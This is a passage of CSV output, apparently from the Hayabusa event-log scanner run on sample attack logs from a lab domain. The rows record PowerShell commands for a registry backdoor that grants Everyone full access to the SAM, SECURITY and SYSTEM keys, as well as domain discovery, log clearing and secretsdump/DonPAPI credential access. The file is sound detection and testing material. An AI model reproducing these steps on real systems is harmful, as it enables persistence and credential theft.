the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.571 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.571 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.571 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.571 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.587 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.587 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.587 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.603 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.627 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.627 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.634 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.634 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.634 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.634 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.650 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.650 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.650 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.650 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03] Backdooring completed for system""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.666 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.666 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""PSObject""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.666 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" ParameterBinding(Add-Member): name=""Name""; value=""ComputerName"" ParameterBinding(Add-Member): name=""Value""; value=""FS03"" ParameterBinding(Add-Member): name=""InputObject""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.666 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" ParameterBinding(Add-Member): name=""Name""; value=""BackdoorTrustee"" ParameterBinding(Add-Member): name=""Value""; value=""S-1-1-0"" ParameterBinding(Add-Member): name=""InputObject""; value=""@{ComputerName=FS03}""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.666 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""@{ComputerName=FS03; BackdoorTrustee=S-1-1-0}""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-12 06:56:59.657 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"foreach ($s in [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites ){write-host ""[>] (site) $s"";foreach ($r in $s.Subnets){write-host "" └─> (subnet) $r"";foreach ($m in $s.Servers){write-host "" └─> (server) $m""}}}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 06:56:59.657 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) OFFSEC-PREMISE""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 06:56:59.673 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) LONDON""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 06:56:59.673 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 06:56:59.673 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 07:15:28.352 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.716 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:15:56.716 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.724 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:15:56.724 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:15:56.724 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.724 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.724 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.740 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.740 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.756 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.782 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.782 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.782 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.782 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.797 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.817 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8723c99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.829 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.929 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.929 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.929 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:58.454 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x33c | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.403 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.403 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.403 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.693 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.693 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.693 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.709 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.714 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.716 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.716 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.716 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 